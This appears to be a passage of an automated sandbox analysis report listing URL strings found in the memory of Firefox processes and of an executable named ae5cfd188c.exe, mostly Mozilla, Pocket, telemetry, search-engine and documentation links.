Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889988240.000035F0F6404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2890720669.0000372F1F704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sresource://gre/modules/handlers/HandlerList.sys.mj
Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000003.2742255243.000002BA5A163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000018.00000002.2889075369.00002786E1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A72F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotschrome://browser/content/parent/ext-windows.js
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2795803239.000002BA555BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
